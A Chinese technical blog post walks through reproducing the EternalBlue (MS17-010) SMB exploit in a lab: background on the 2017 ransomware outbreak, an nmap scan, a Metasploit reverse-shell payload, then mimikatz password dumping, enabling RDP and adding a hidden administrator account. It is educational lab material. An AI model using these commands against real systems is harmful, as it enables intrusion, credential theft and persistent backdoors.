1. 首页
  2. 技术小贴

漏洞复现:”MS_17010 永恒之蓝”

漏洞影响

技术小贴
技术小贴

2017年5月12日起,全球范围内爆发基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,这是不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。

五个小时内,包括英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件,对重要数据造成严重损失。

目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

漏洞描述

“永恒之蓝”漏洞通过445和139端口利用SMBv1NBT中的RCE,从而扫描互通网段中开放445文件共享端口的Windows机器,循环反复,受攻击机器呈指数级数度增长。

该漏洞无需用户操作,只需要受攻击机器能够上网,就会被植入勒索软件、远控木马以及挖矿程序等。

复现环境

  • Windows 7 ultimate sp1 x64
  • MSF
  • NMAP

漏洞复现

Nmap扫描

whereis nmap
cd /usr/share/nmap/scripts
ls | grep "ms17-010"
nmap --script smb-vuln-ms17-010.nse 192.168.173.138

image.png

扫描结果显示,该系统存在漏洞。

MSF监听

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.173.138
set lhost 192.168.173.1
set payload windows/x64/meterpreter/reverse_tcp
exploit

提权

meterpreter > getuid         #获取uid
meterpreter > screenshot     #截图
meterpreter > webcam_scream  #抓拍
meterpreter > load mimikatz  #获取系统密码
meterpreter > wdigest        #获取系统密码
meterpreter > run post/windows/manage/enable_rdp #开启远程桌面
rdesktop 192.168.173.138     #登录远程桌面
#开启远程桌面(修改注册表)
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

net user root$ root /add
net localgroup administrators root$ /add

原创文章,作者:小嵘源码,如若转载,请注明出处:https://www.lcpttec.com/ldfx/

联系我们

176-888-72082

在线咨询:点击这里给我发消息

邮件:2668888288@qq.com

工作时间:周一至周五,9:00-18:00,节假日休息

QR code